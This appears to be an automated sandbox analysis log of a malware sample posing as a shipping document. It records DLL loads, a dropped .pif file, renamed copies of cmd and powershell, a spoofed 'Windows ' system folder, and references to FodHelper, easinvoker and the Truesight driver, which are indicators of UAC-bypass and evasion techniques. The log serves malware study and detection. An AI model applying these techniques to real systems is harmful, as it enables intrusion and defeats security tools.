Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File opened: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.cfg

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\xkn.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows \System32\per.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static file information: File size 1050624 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 